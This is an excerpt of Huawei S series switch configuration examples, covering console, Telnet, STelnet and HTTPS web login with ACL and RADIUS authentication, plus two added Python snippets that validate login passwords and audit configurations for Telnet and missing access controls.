3.1 Example for Configuring Switch Login Through a Console Port
3.2 Example for Configuring Telnet Login (Based on ACL Rules and RADIUS Authentication)
3.3 Example for Configuring STelnet Login (Based on RADIUS Authentication)
3.4 Example for Configuring Switch Login Through the Web System


3.1 Example for Configuring Switch Login Through a Console Port
Overview
After a PC is connected to a switch through a dedicated console cable, you can perform login
configurations and use the PC to manage the switch.
As the basic login mode, login through a console port is the basis of other login modes such
as Telnet and STelnet login modes. When you log in to a switch for the first time or fail to
remotely log in to a switch, you can log in to the switch through a console port.

Configuration Notes
l Prepare a console cable (delivered with the device). If you use a laptop or a PC without a
serial port, prepare a USB to serial cable and install the driver stored on the CD-ROM
(delivered with the cable) according to instructions.
l Install the terminal emulation software on the PC. You can use the built-in
HyperTerminal of Windows 2000 on the PC. If no built-in terminal emulation software is
available, prepare the terminal emulation software. For details on how to use terminal
emulation software, see the related usage guide or online help. The third-party software
SecureCRT is used as an example here.
l This example applies to all versions and models of S series switches.

Networking Requirements
The IT maintenance department of a company purchases S series switches, which are
configured by network administrators. A network administrator usually logs in to a new
switch through a console port and then performs initial configurations.
As shown in Figure 3-1, the serial port of a PC is connected to the console port of the Switch
through a console cable. The user wants to log in to the Switch through the console port and
requires local authentication upon the next login. To facilitate remote maintenance on the
Switch, the user wants to configure the Telnet function.

Figure 3-1 Networking diagram for configuring switch login through a console port
(The serial port of the PC is connected by a console cable to the console port of the Switch, 10.1.1.1/24.)

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure terminal emulation software, set the connected port and communication
parameters, and log in to the Switch.
2. Configure basic information for the Switch, including the date, time, time zone, and
name, to facilitate management.


3. Configure an authentication mode for the console user interface so that the user is
authenticated upon the next login through the console port.
4. Configure the management IP address and Telnet to facilitate remote maintenance on the
Switch.

Procedure
Step 1 Connect the DB9 female connector of the console cable to the COM port on the PC, and
connect the RJ45 connector to the console port on the device, as shown in Figure 3-2.

Figure 3-2 Connecting to the device through the console port

NOTE

l If you use a laptop or a PC without a serial port, prepare a USB to serial cable. Install the driver
stored on the CD-ROM (delivered with the cable) according to instructions, connect the USB-DB9
female connector of the cable to the USB port on the PC, and connect the RJ-45 connector to the
console port on the device.
l If the device has two MPUs, you can log in to the device through the console port on either of the
two MPUs.

Step 2 Configure terminal emulation software and log in to the Switch.


Start terminal emulation software (SecureCRT as an example) on the PC. Establish a
connection, and set the connected port and communication parameters. Table 3-1 lists the
default attribute settings of a console port.

Table 3-1 Default attribute settings of a console port

Parameter       Default Setting
Baud rate       9600 bit/s
Flow control    None
Parity          None
Stop bits       1
Data bits       8

1. Click to establish a connection, as shown in Figure 3-3.

Figure 3-3 Establishing a connection

2. Set the connected port and communication parameters, as shown in Figure 3-4.

Select the connected port based on actual situations. For example, you can view port
information in Device Manager in the Windows operating system, and select the
connected port.

Communication parameters of terminal emulation software must be consistent with the
default attribute settings of the console port on the Switch, which are 9600 bit/s
transmission rate, 8 data bits, 1 stop bit, no parity check, and no flow control.


NOTE

By default, no flow control mode is configured on the switch. Because RTS/CTS is selected in the
software by default, you need to deselect RTS/CTS; otherwise, you cannot enter commands.

Figure 3-4 Setting the connected port and communication parameters

3. Click Connect. The following information is displayed, prompting you to set a
password. No default password exists upon the first login, and you need to set the login
password. (The following information is only for reference.)
An initial password is required for the first login via the console.
Continue to set it? [Y/N]: y //Configure the login password.
Set a password and keep it safe. Otherwise you will not be able to login via
the console.
Please configure the login password (8-16)
Enter Password:
Confirm Password:
<HUAWEI>

– The value is a string of 8 to 16 case-sensitive characters without spaces. The
password must contain at least two types of the following: upper-case and lower-case
letters, digits, and special characters except the question mark (?).
– The password entered in interactive mode is not displayed on the screen.
– When you log in to the device again in password authentication mode, enter the
password set during the initial login if you have not modified the authentication
mode and password.

You can run commands to configure the Switch. Enter a question mark (?) whenever you
need help.
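As an added example (not part of the Huawei document), the following Python function checks a candidate password against the rules listed above and returns every rule it breaks, so a provisioning script can validate the value before the first-login password is set. It treats the question mark as not permitted anywhere in the password, which is this example's reading of "special characters except the question mark", and it counts only ASCII letters, digits and punctuation as valid characters.

```python
# Added example (not Huawei code): validate a first-login console password
# against the policy stated in the document.
import string

# Character classes from the policy: upper-case, lower-case, digits, and special
# characters other than the question mark. Assumption: '?' (the CLI help key)
# is rejected anywhere in the password, not merely excluded from the class count.
UPPER = set(string.ascii_uppercase)
LOWER = set(string.ascii_lowercase)
DIGITS = set(string.digits)
SPECIAL = set(string.punctuation) - {"?"}
ALLOWED = UPPER | LOWER | DIGITS | SPECIAL


def check_login_password(password):
    """Return the list of policy violations for a console login password.

    An empty list means the password satisfies every rule: 8 to 16 characters,
    no spaces, no question mark, ASCII only, and at least two of the four
    character classes (upper-case, lower-case, digit, special).
    """
    problems = []
    if not 8 <= len(password) <= 16:
        problems.append("length must be 8 to 16 characters")
    if " " in password:
        problems.append("spaces are not allowed")
    if "?" in password:
        problems.append("the question mark (?) is not allowed")
    # Space and '?' have already been reported above, so skip them here.
    if any(c not in ALLOWED and c not in " ?" for c in password):
        problems.append("only ASCII letters, digits and special characters are allowed")
    classes_used = sum(1 for cls in (UPPER, LOWER, DIGITS, SPECIAL)
                       if any(c in cls for c in password))
    if classes_used < 2:
        problems.append("at least two character types are required")
    return problems


if __name__ == "__main__":
    # Helloworld@6789 is the password used later in this example.
    for candidate in ("Helloworld@6789", "helloworld", "Hello World1", "Hello?123"):
        print(repr(candidate), "->", check_login_password(candidate) or "OK")
```

The function reports all violations at once rather than stopping at the first, which is what an operator wants when a script rejects a generated password.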

Step 3 Configure basic information for the Switch.

# Set the date, time, time zone, and name.


NOTE

The time zone varies depending on the location of a switch. Set the time zone based on the site requirements.
The following information is only for reference.
<HUAWEI> clock timezone BJ add 08:00:00 //BJ is the name of the time zone, and
add 08:00:00 sets the local time to UTC plus 8 hours.
<HUAWEI> clock datetime 10:10:00 2014-07-26 //Set the current date and time.
Before setting the current time, check the time zone and set a correct time zone
offset to ensure the correct local time.
<HUAWEI> system-view
[HUAWEI] sysname Switch //Set the switch name to Switch.

Step 4 Configure an authentication mode for the console user interface.

# Set the authentication mode of the console interface to AAA, and create a local user.
[Switch] user-interface console 0
[Switch-ui-console0] authentication-mode aaa //Set the authentication mode of
the user to AAA.
[Switch-ui-console0] quit
[Switch] aaa
[Switch-aaa] local-user admin1234 password irreversible-cipher
Helloworld@6789 //Create a local user named admin1234 and set its password to
Helloworld@6789.
[Switch-aaa] local-user admin1234 privilege level 15 //Set the user level to
15.
[Switch-aaa] local-user admin1234 service-type terminal //Set the access type
to terminal, that is, console user.
[Switch-aaa] quit

Step 5 Configure the management IP address and Telnet.

# Configure the management IP address.


[Switch] vlan 10
[Switch-vlan10] interface vlanif 10 //Configure VLANIF 10 as the management
interface.
[Switch-Vlanif10] ip address 10.1.1.1 24
[Switch-Vlanif10] quit
[Switch] interface gigabitethernet 0/0/10 //GE0/0/10 is the physical interface
through which the PC reaches the switch for remote login. Select an
interface based on actual networking requirements.
[Switch-GigabitEthernet0/0/10] port link-type access //Set the interface type
to access.
[Switch-GigabitEthernet0/0/10] port default vlan 10 //Add GE0/0/10 to VLAN 10.
[Switch-GigabitEthernet0/0/10] quit

# Configure the Telnet function.


[Switch] telnet server enable //Enable Telnet.
[Switch] user-interface vty 0 4 //Enter the user interface views of VTY 0 to
VTY 4.
[Switch-ui-vty0-4] user privilege level 15 //Set the level of users in VTY 0
to VTY 4 to 15.
[Switch-ui-vty0-4] authentication-mode aaa //Set the authentication mode of
users in VTY 0 to VTY 4 to AAA.
[Switch-ui-vty0-4] quit
[Switch] aaa
[Switch-aaa] local-user admin123 password irreversible-cipher Huawei@6789 //
Create a local user named admin123 and set its password to Huawei@6789.
[Switch-aaa] local-user admin123 privilege level 15 //Set the user level to 15.
[Switch-aaa] local-user admin123 service-type telnet //Set the access type to
telnet, that is, Telnet user.
[Switch-aaa] quit

Step 6 Verify the configuration.


Enter the user name admin1234 and password Helloworld@6789 to pass identity
authentication before re-logging in to the Switch from the console user interface. You can also
log in to the Switch using Telnet.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10
#
telnet server enable
#
clock timezone BJ add 08:00:00
#
aaa
local-user admin123 password irreversible-cipher %^%#}+ysUO*B&+p'NRQR0{ZW7[GA*Z*!X@o:Va15dxQAj+,$>NP>63de|G~ws,9G%^%#
local-user admin123 privilege level 15
local-user admin123 service-type telnet
local-user admin1234 password irreversible-cipher %^%#}+ysUO*B&+p'NRQR0{ZW7[GA*Z*!X@o:Va15dxQAj+,$>NP>63de|G~ws,9G%^%#
local-user admin1234 privilege level 15
local-user admin1234 service-type terminal
local-user admin1234 privilege level 15
local-user admin1234 service-type terminal
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface GigabitEthernet0/0/10
port link-type access
port default vlan 10
#
user-interface con 0
authentication-mode aaa
user-interface vty 0 4
authentication-mode aaa
user privilege level 15
#
return

Related Content
Videos
Log In to a Switch Through the Console Port.

3.2 Example for Configuring Telnet Login (Based on ACL Rules and RADIUS Authentication)
Overview
Telnet login to a switch facilitates remote management and maintenance on the switch so that
you do not need to connect a terminal to each switch. By default, you cannot log in to a
switch using Telnet. You need to log in to a switch through a console port and configure the
Telnet function first. For the detailed configuration, see 3.1 Example for Configuring Switch
Login Through a Console Port.


An Access Control List (ACL) is a packet filter that filters packets based on rules. One or
more rules describe the packet matching conditions, such as the source address, destination
address, and port number of packets. For packets that match the ACL rules configured on a
device, the device forwards or discards these packets according to the policies used by the
service module to which the ACL is applied.
RADIUS uses the client/server model in distributed mode and protects a network against
unauthorized access. It is often used on networks that require high security and remote user
access control. After Telnet login based on RADIUS authentication is configured, a switch
sends the user name and password of a login user to the RADIUS server. The RADIUS server
then authenticates the user and records the user operations, ensuring network security.
If ACLs and RADIUS authentication are both configured, packets matching ACL rules reach
an upper-layer module and then are authenticated in RADIUS mode based on the user name
and password. The Telnet login mode based on ACL rules and RADIUS authentication
therefore ensures network security.

Configuration Notes
l The Telnet protocol will bring security risks. The STelnet V2 mode is recommended.
l Ensure that the user terminal has reachable routes to the switch and RADIUS server.
l Ensure that the IP address, port number, and shared key of the RADIUS server are
configured correctly on the switch and are the same as those on the RADIUS server.
l Ensure that a user has been configured on the RADIUS server. In this example, the user
admin@huawei.com (in format of user name@domain name) and password
Huawei@1234 have been configured.
l This example applies to all versions and models of S series switches.
NOTE

The following uses the command lines and outputs in V200R006C00 as an example.

Networking Requirements
The network administrator requires remote management and maintenance on a switch and
high network security for protecting the network against unauthorized access. To meet the
requirements, configure Telnet login based on ACL rules and RADIUS authentication.
As shown in Figure 3-5, the Switch has reachable routes to the administrator and the
RADIUS server. The IP address and port number of the RADIUS server are 10.2.1.1/24 and
1812 respectively.

Figure 3-5 Networking diagram for configuring Telnet login based on ACL rules and
RADIUS authentication
(Network Administrator 10.137.217.177/24 -- Network -- Switch 10.1.1.1/24 -- Network -- RADIUS Server 10.2.1.1/24)


Configuration Roadmap
The configuration roadmap is as follows:
1. Configure the Telnet protocol so that users can log in to the Switch using Telnet.
2. Configure an ACL rule to ensure that only users matching the ACL rule can log in to the
Switch.
3. Configure the RADIUS protocol to implement RADIUS authentication. After the
configuration is complete, you can use the user name and password configured on the
RADIUS server to log in to the Switch using Telnet, ensuring user login security.

Procedure
Step 1 Configure Telnet login.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] telnet server enable
[Switch] user-interface vty 0 14 //Enter the user interface views of VTY 0 to
VTY 14.
[Switch-ui-vty0-14] protocol inbound telnet //Configure the VTY user interface
to support Telnet. By default, switches in V200R006 and earlier versions support
Telnet, and switches in V200R007 and later versions support SSH.
[Switch-ui-vty0-14] authentication-mode aaa //Set the authentication mode of
users in VTY 0 to VTY 14 to AAA.
[Switch-ui-vty0-14] user privilege level 15 //Set the level of users in VTY 0
to VTY 14 to 15.
[Switch-ui-vty0-14] quit

Step 2 Configure a basic ACL rule.


[Switch] acl 2008
[Switch-acl-basic-2008] rule permit source 10.137.217.177 0
[Switch-acl-basic-2008] quit
[Switch] user-interface vty 0 14
[Switch-ui-vty0-14] acl 2008 inbound //Allow only users matching ACL 2008 in
VTY 0 to VTY 14 to log in to the switch.
[Switch-ui-vty0-14] quit
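The console and Telnet setup of 3.1 and the ACL restriction in Step 2 above are exactly the settings a reviewer checks when auditing saved configuration files. The following Python script is an added example (not Huawei code and not part of this document) that scans a constructed, VRP-style configuration modelled on the 3.1 configuration file and reports four findings: Telnet enabled (the Configuration Notes recommend STelnet V2), a user interface with no authentication mode, a VTY user interface with no inbound ACL, and a local user allowed the Telnet service type. The hardened variant applies ACL 2008 from Step 2 and moves the user to SSH; the stelnet server enable command and the service-type ssh value are VRP commands, while the cipher-text placeholders are constructed.

```python
# Added example (not Huawei code): audit login hardening in a VRP-style
# configuration file. Sample configs are constructed for this example.
import re

# Modelled on the Switch configuration file in 3.1: Telnet enabled, VTY lines
# with AAA but no ACL; the irreversible-cipher text is a placeholder.
SAMPLE_CONFIG = """\
#
sysname Switch
#
telnet server enable
#
aaa
 local-user admin123 password irreversible-cipher <cipher-text-placeholder>
 local-user admin123 privilege level 15
 local-user admin123 service-type telnet
 local-user admin1234 password irreversible-cipher <cipher-text-placeholder>
 local-user admin1234 privilege level 15
 local-user admin1234 service-type terminal
#
user-interface con 0
 authentication-mode aaa
user-interface vty 0 4
 authentication-mode aaa
 user privilege level 15
#
return
"""

# Same device after applying the ACL from Step 2 and replacing Telnet with
# STelnet (SSH), as the Configuration Notes recommend.
HARDENED_CONFIG = (SAMPLE_CONFIG
                   .replace("telnet server enable", "stelnet server enable")
                   .replace("service-type telnet", "service-type ssh")
                   .replace(" user privilege level 15",
                            " user privilege level 15\n acl 2008 inbound"))


def audit_login_config(config):
    """Scan a VRP-style configuration and return sorted (finding, subject) pairs.

    Findings: telnet-enabled, no-authentication (user-interface block without
    authentication-mode or with 'none'), vty-no-acl (VTY block without an
    inbound ACL), telnet-user (local user whose service-type includes telnet).
    """
    findings = []
    blocks = {}          # "con 0" / "vty 0 4" -> child commands of that block
    current = None
    for raw in config.splitlines():
        stripped = raw.strip()
        if not raw.startswith(" "):              # top-level command
            m = re.match(r"user-interface (\S+(?: \d+)+)$", stripped)
            current = m.group(1) if m else None
            if current:
                blocks[current] = []
            if stripped == "telnet server enable":
                findings.append(("telnet-enabled", "global"))
            continue
        if current:                              # child of a user-interface block
            blocks[current].append(stripped)
        m = re.match(r"local-user (\S+) service-type (.+)$", stripped)
        if m and "telnet" in m.group(2).split():
            findings.append(("telnet-user", m.group(1)))
    for name, cmds in blocks.items():
        auth = [c for c in cmds if c.startswith("authentication-mode")]
        if not auth or auth[0].split()[-1] == "none":
            findings.append(("no-authentication", name))
        if name.startswith("vty") and not any(re.match(r"acl \d+ inbound$", c) for c in cmds):
            findings.append(("vty-no-acl", name))
    return sorted(findings)


if __name__ == "__main__":
    print("sample:  ", audit_login_config(SAMPLE_CONFIG))
    print("hardened:", audit_login_config(HARDENED_CONFIG))
```

The scan is deliberately line-oriented: VRP writes one space of indentation for commands inside a view, so a block ends at the next unindented line, and that is all the structure the checks need. Run against the real display current-configuration output, the same function applies unchanged.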

Step 3 Configure RADIUS authentication.


# Configure a RADIUS server template on the Switch to implement communication with the
RADIUS server.
[Switch] radius-server template 1 //Enter the RADIUS server template view.
[Switch-radius-1] radius-server authentication 10.2.1.1 1812 //Configure the
RADIUS server.
[Switch-radius-1] radius-server shared-key cipher Huawei@6789 //Set the shared
key of the RADIUS server to Huawei@6789.
[Switch-radius-1] quit

NOTE

If the RADIUS server does not support a user name containing the domain name, run the undo radius-server user-name domain-included command to configure the Switch to send packets carrying a user name without the domain name to the RADIUS server.

# Configure an AAA authentication scheme, with the authentication mode being RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme sch1 //Create an authentication scheme named sch1.
[Switch-aaa-authen-sch1] authentication-mode radius //Set the authentication mode to RADIUS.
[Switch-aaa-authen-sch1] quit

# Create a domain, and apply the AAA authentication scheme and RADIUS server template
in the domain.
[Switch-aaa] domain huawei.com //Create a domain named huawei.com and enter the domain view.
[Switch-aaa-domain-huawei.com] authentication-scheme sch1 //Configure the authentication scheme sch1 for the domain.
[Switch-aaa-domain-huawei.com] radius-server 1 //Apply the RADIUS server template 1 to the domain.
[Switch-aaa-domain-huawei.com] quit
[Switch-aaa] quit

# Configure the domain huawei.com as the default global management domain so that an
administrator does not need to enter the domain name for logging in to the Switch.
[Switch] domain huawei.com admin

Step 4 Verify the configuration.
Choose Start > Run as an administrator. Enter cmd to enter the Windows Command Prompt
window. Type telnet 10.1.1.1, and press Enter.
C:\Documents and Settings\Administrator> telnet 10.1.1.1

In the login interface, type the user name admin and password Huawei@1234 as prompted
and press Enter. Authentication succeeds, and you successfully log in to the Switch using
Telnet. (The following information is only for reference.)
Login authentication

Username:admin
Password:
Info: The max number of VTY users is 8, and the number
of current VTY users on line is 2.
The current login time is 2014-07-30 09:54:02+08:00.
<Switch>

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
domain huawei.com admin
#
telnet server enable
#
radius-server template 1
radius-server shared-key cipher %^%#}+ysUO*B&+p'NRQR0{ZW7[GA*Z*!X@o:Va15dxQAj+,$>NP>63de|G~ws,9G%^%#
radius-server authentication 10.2.1.1 1812 weight 80
#
acl number 2008
rule 5 permit source 10.137.217.177 0
#
aaa
authentication-scheme sch1
authentication-mode radius
domain huawei.com
authentication-scheme sch1
radius-server 1
#
user-interface vty 0 14
acl 2008 inbound
authentication-mode aaa
user privilege level 15
protocol inbound telnet
#
return

Related Content
Videos
Remotely Log In to a Switch Using Telnet.

3.3 Example for Configuring STelnet Login (Based on RADIUS Authentication)
Overview
The Secure Shell (SSH) protocol implements secure remote login on insecure networks,
which ensures data integrity and reliability and guarantees secure data transmission. STelnet,
based on the SSH protocol, ensures information security and provides a powerful
authentication function. STelnet protects a switch against attacks such as IP spoofing. By
default, you cannot log in to a switch using STelnet. You need to log in to a switch using a
console port or Telnet, and configure the STelnet function and user interface parameters first.
RADIUS uses the client/server model in distributed mode and protects a network against
unauthorized access. It is often used on networks that require high security and remote user
access control. After STelnet login based on RADIUS authentication is configured, a switch
sends the user name and password of a login user to the RADIUS server. The RADIUS server
then authenticates the user and records the user operations, ensuring network security.

Configuration Notes
l The STelnet V1 protocol will bring security risks. The STelnet V2 mode is
recommended.
l Ensure that the user terminal has SSH client software installed before configuring
STelnet login. In this example, the third-party software PuTTY is used as the SSH client.
l Ensure that the user terminal has reachable routes to the switch and RADIUS server.
l Ensure that the IP address, port number, and shared key of the RADIUS server are
configured correctly on the switch and are the same as those on the RADIUS server.
l Ensure that a user has been configured on the RADIUS server. In this example, the user
admin@huawei.com (in format of user name@domain name) and password
Huawei@1234 have been configured.
l This example applies to all versions and models of S series switches.

Networking Requirements
The network administrator requires remote login to a switch and high network security for
protecting the network against unauthorized access. To meet the requirements, configure
STelnet login based on RADIUS authentication.
As shown in Figure 3-6, the Switch functions as the SSH server and has a reachable route to
the RADIUS server. The IP address and port number of the RADIUS server are 10.2.1.1/24
and 1812 respectively.

Figure 3-6 Networking diagram for configuring STelnet login based on RADIUS
authentication
[Figure: Network Administrator 10.137.217.177/24, Switch 10.1.1.1/24 and RADIUS Server 10.2.1.1/24 connected over the network]

Configuration Roadmap
The configuration roadmap is as follows:
1. Generate a local key pair on the SSH server to implement secure data exchange between
the server and client.
2. Configure the STelnet protocol so that users can log in to the Switch using STelnet.
3. Configure the RADIUS protocol to implement RADIUS authentication. After the
configuration is complete, you can use the user name and password configured on the
RADIUS server to log in to the Switch using STelnet, ensuring user login security.

Procedure
Step 1 Configure STelnet login.
# Generate a local key pair on the server.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] dsa local-key-pair create //Generate a local DSA key pair.
Info: The key name will be: HUAWEI_Host_DSA.
Info: The key modulus can be any one of the following : 1024, 2048.
Info: If the key modulus is greater than 512, it may take a few minutes.
Please input the modulus [default=2048]:
Info: Generating keys...
Info: Succeeded in creating the DSA host keys.

# Configure the VTY user interface.
[Switch] stelnet server enable //Enable the STelnet server function.
[Switch] user-interface vty 0 14 //Enter the user interface views of VTY 0 to VTY 14.
[Switch-ui-vty0-14] user privilege level 15 //Set the level of users in VTY 0 to VTY 14 to 15.
[Switch-ui-vty0-14] authentication-mode aaa //Set the authentication mode of users in VTY 0 to VTY 14 to AAA.
[Switch-ui-vty0-14] protocol inbound ssh //Configure the user interface views in VTY 0 to VTY 14 to support SSH.
[Switch-ui-vty0-14] quit

# Set the authentication mode of the SSH user admin to password authentication, and service
type to STelnet.
[Switch] ssh user admin authentication-type password //Set the authentication of the SSH user admin to password authentication.
[Switch] ssh user admin service-type stelnet //Set the service type of the SSH user admin to STelnet.

NOTE

To configure password authentication for multiple SSH users, run the ssh authentication-type default
password command to specify password authentication as the default authentication mode of SSH
users. After this configuration is complete, you do not need to configure the authentication mode and
service type for each SSH user, simplifying configuration and improving efficiency.

Step 2 Configure RADIUS authentication.
# Configure a RADIUS server template on the Switch to implement communication with the
RADIUS server.
[Switch] radius-server template 1 //Enter the RADIUS server template view.
[Switch-radius-1] radius-server authentication 10.2.1.1 1812 //Configure the RADIUS server.
[Switch-radius-1] radius-server shared-key cipher Huawei@6789 //Set the shared key of the RADIUS server to Huawei@6789.
[Switch-radius-1] quit

NOTE

If the RADIUS server does not support a user name containing the domain name, run the
undo radius-server user-name domain-included command to configure the Switch to send
packets carrying a user name without the domain name to the RADIUS server.

# Configure an AAA authentication scheme, with the authentication mode being RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme sch1 //Create an authentication scheme named sch1.
[Switch-aaa-authen-sch1] authentication-mode radius //Set the authentication mode to RADIUS.
[Switch-aaa-authen-sch1] quit

# Create a domain, and apply the AAA authentication scheme and RADIUS server template
in the domain.
[Switch-aaa] domain huawei.com //Create a domain named huawei.com and enter the domain view.
[Switch-aaa-domain-huawei.com] authentication-scheme sch1 //Configure the authentication scheme sch1 for the domain.
[Switch-aaa-domain-huawei.com] radius-server 1 //Apply the RADIUS server template 1 to the domain.
[Switch-aaa-domain-huawei.com] quit
[Switch-aaa] quit

# Configure the domain huawei.com as the default global management domain so that an
administrator does not need to enter the domain name for logging in to the Switch.
[Switch] domain huawei.com admin

Step 3 Verify the configuration.
# Log in to the Switch using PuTTY on the PC. Enter the IP address of the Switch and set the
protocol type to SSH, as shown in Figure 3-7.

Figure 3-7 Connecting to the SSH server using PuTTY

# Click Open. In the login interface, type the user name admin and password Huawei@1234
as prompted and press Enter. Authentication succeeds, and you successfully log in to the
Switch using STelnet. (The following information is only for reference.)
login as: admin
password:
Info: The max number of VTY users is 8, and the number
of current VTY users online is 2.
The current login time is 2014-07-30 09:54:02+08:00.
<Switch>

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
domain huawei.com admin
#
radius-server template 1
radius-server shared-key cipher %^%#}+ysUO*B&+p'NRQR0{ZW7[GA*Z*!X@o:Va15dxQAj+,$>NP>63de|G~ws,9G%^%#
radius-server authentication 10.2.1.1 1812 weight 80
#
aaa
authentication-scheme sch1
authentication-mode radius
domain huawei.com
authentication-scheme sch1
radius-server 1
#
user-interface vty 0 14
authentication-mode aaa
user privilege level 15
#
stelnet server enable
ssh user admin
ssh user admin authentication-type password
ssh user admin service-type stelnet
#
return

Related Content
Videos
Remotely Log In to a Switch Using Telnet.

3.4 Example for Configuring Switch Login Through the Web System
3.4.1 Factory Settings of Web Page Files for S Series Switches
Table 3-2 Factory settings of web page files for S series switches

Product Model  | V200R005 | V200R006 | V200R007 | V200R008 | V200R009
S12708/S12712  | The system software contains a web page file that is loaded. (all listed versions)
S12704         | - | - | - | The system software contains a web page file that is loaded. | The system software contains a web page file that is loaded.

NOTE

A hyphen (-) indicates that the model does not have this version.

3.4.2 Example for Configuring Switch Login Through the Web System (V200R005)
Overview
As a switch management mode, the web system leverages the built-in web server on a switch
to provide a GUI for users. Users can log in to the web system using HTTPS from terminals
and perform switch management and maintenance.
The web system is available in Classics and EasyOperation versions.
l The EasyOperation version provides rich graphics and a more user-friendly UI on which
users can perform monitoring, configuration, maintenance, and other network operations.
l The Classics version inherits the web page style of Huawei switches and provides
comprehensive configuration and management functions.

Configuration Notes
l This example applies to all models of S series switches in V200R005.

Networking Requirements
As shown in Figure 3-8, a switch functions as the HTTPS server. The user wants to log in to
the web system using HTTPS to manage and maintain the switch.

Figure 3-8 Networking diagram for configuring switch login through the web system
[Figure: PC connected over the network to HTTPS_Server, 192.168.0.1/24]

Configuration Roadmap
NOTE

A switch provides a default SSL policy and has a randomly generated self-signed digital certificate in
the web page file. If the default SSL policy and self-signed digital certificate can meet security
requirements, you do not need to upload a digital certificate or manually configure an SSL policy,
simplifying configuration. The following configuration uses the default SSL policy provided by the
switch as an example.

The system software of the following switch models in V200R005 has integrated and loaded
the web page file (including the EasyOperation and Classics editions). You only need to
configure a web user and enter the web system login page.
The Classics web page file has been loaded on the S5700SI, S5700EI, S5710EI, S5700HI,
S5710HI, and S6700EI in V200R005. To use the Classics web system, you only need to
configure a web user and enter the web system login page. To use the EasyOperation web
system, perform the configuration based on the following roadmap:
1. Configure a management IP address for remotely transferring files and log in to the
switch through the web system.

2. Upload the web page file to the HTTPS server through FTP.
3. Load the web page file.
4. Configure a web user and enter the web system login page.

NOTICE
The FTP protocol will bring risks to network security. The SFTP V2, SCP, or FTPS mode is
recommended.

Procedure
Step 1 Obtain the web page file.
The following methods are available:
l Obtain the web page file from Huawei agent.
l Download the web page file from Huawei enterprise technical support website.
– For a fixed switch, download the system software containing the web page file.
– For a modular switch, download the web page file.
– In V200R005, the web page file is named in the format product name-software
version.web page file version.web.7z.

NOTE

Check whether the size of the obtained web page file is the same as the file size displayed on the
website. If not, an exception may occur during file download. Download the file again.

Step 2 Configure a management IP address.
<HUAWEI> system-view
[HUAWEI] sysname HTTPS_Server
[HTTPS_Server] vlan 10
[HTTPS_Server-vlan10] interface vlanif 10 //Configure VLANIF 10 as the management interface.
[HTTPS_Server-Vlanif10] ip address 192.168.0.1 24 //Configure the IP address and deploy the route based on the network plan to ensure reachability between the PC and switch.
[HTTPS_Server-Vlanif10] quit
[HTTPS_Server] interface gigabitethernet 0/0/10 //In this example, GE0/0/10 is the physical interface used for logging in to the switch through the web system on a PC. Select an interface based on actual networking requirements.
[HTTPS_Server-GigabitEthernet0/0/10] port link-type access //Set the interface type to access.
[HTTPS_Server-GigabitEthernet0/0/10] port default vlan 10 //Add the interface to VLAN 10.
[HTTPS_Server-GigabitEthernet0/0/10] quit

Step 3 Upload the web page file to the HTTPS server through FTP.
# Configure VTY user interfaces on the HTTPS server.
[HTTPS_Server] user-interface vty 0 14 //Enter VTY user interfaces 0 to 14.
[HTTPS_Server-ui-vty0-14] authentication-mode aaa //Set the authentication mode of users in VTY user interfaces 0 to 14 to AAA.
[HTTPS_Server-ui-vty0-14] quit

# Configure the FTP function for the device and information about an FTP user, including the
password, user level, service type, and authorized directory.

[HTTPS_Server] ftp server enable //Enable the FTP server function.
[HTTPS_Server] aaa
[HTTPS_Server-aaa] local-user client001 password irreversible-cipher Helloworld@6789 //Set the login password to Helloworld@6789.
[HTTPS_Server-aaa] local-user client001 privilege level 15 //Set the user level to 15.
[HTTPS_Server-aaa] local-user client001 service-type ftp //Set the user service type to FTP.
[HTTPS_Server-aaa] local-user client001 ftp-directory flash:/ //Set the FTP authorized directory to flash:/.
[HTTPS_Server-aaa] quit

# Log in to the HTTPS server from the PC through FTP and upload the web page file to the
HTTPS server.
Connect the PC to the device using FTP. Enter the user name client001 and password
Helloworld@6789 and set the file transfer mode to binary.
The following example assumes that the PC runs the Windows XP operating system.
C:\Documents and Settings\Administrator> ftp 192.168.0.1
Connected to 192.168.0.1.
220 FTP service ready.
User (192.168.0.1:(none)): client001
331 Password required for client001.
Password:
230 User logged in.
ftp> binary //Set the file transfer mode to binary. By default, files are transferred in ASCII mode.
200 Type set to I.
ftp>

Upload the web page file to the HTTPS server from the PC.
ftp> put web.7z //Upload the web page file. The web.7z file is used as an example here.
200 Port command okay.
150 Opening BINARY mode data connection for web.zip
226 Transfer complete.
ftp: 1308478 bytes sent in 11 Seconds 4.6Kbytes/sec.

NOTE

If the size of the web page file in the current directory on the switch is different from that on the PC, an
exception may occur during file transfer. Upload the web page file again.

Step 4 Load the web page file.
# Load the web page file.
[HTTPS_Server] http server load web.7z //Load the web page file.

Step 5 Enable the HTTPS service.
[HTTPS_Server] http secure-server enable //The HTTPS service is enabled by default and does not require manual configuration. If the HTTPS service is manually disabled, run this command to enable it.

Step 6 Configure a web user and enter the web system login page.
# Configure a web user.
[HTTPS_Server] aaa
[HTTPS_Server-aaa] local-user admin password irreversible-cipher Helloworld@6789 //Set the login password to Helloworld@6789.
[HTTPS_Server-aaa] local-user admin privilege level 15 //Set the user level to 15.
[HTTPS_Server-aaa] local-user admin service-type http //Set the user service type to HTTP.
[HTTPS_Server-aaa] quit

# Enter the web system login page.

Open the web browser on the PC, type https://192.168.0.1 in the address box, and press
Enter. The web system login page is displayed, as shown in Figure 3-9.

You can log in to the EasyOperation web system using the Internet Explorer (8.0 or later),
Firefox (12.0 or later), or Google Chrome (23.0 or later) browsers and to the Classics web
system using the Internet Explorer (8.0 or later) or Firefox (12.0 or later) browsers. If the
version of your web browser is not supported, the web page may be displayed incorrectly.
Additionally, the web browser used to log in to the web system must support JavaScript.

Enter the web user name admin and password Helloworld@6789, and click GO or press
Enter. The web system home page is displayed. The EasyOperation web system is logged in
by default.

Figure 3-9 Web system login page

Step 7 Verify the configuration.

Log in to the switch through the web system. The login succeeds.

Run the display http server command to view the status of the HTTPS server.
[HTTPS_Server] display http server
HTTP Server Status : enabled
HTTP Server Port : 80(80)
HTTP Timeout Interval : 20
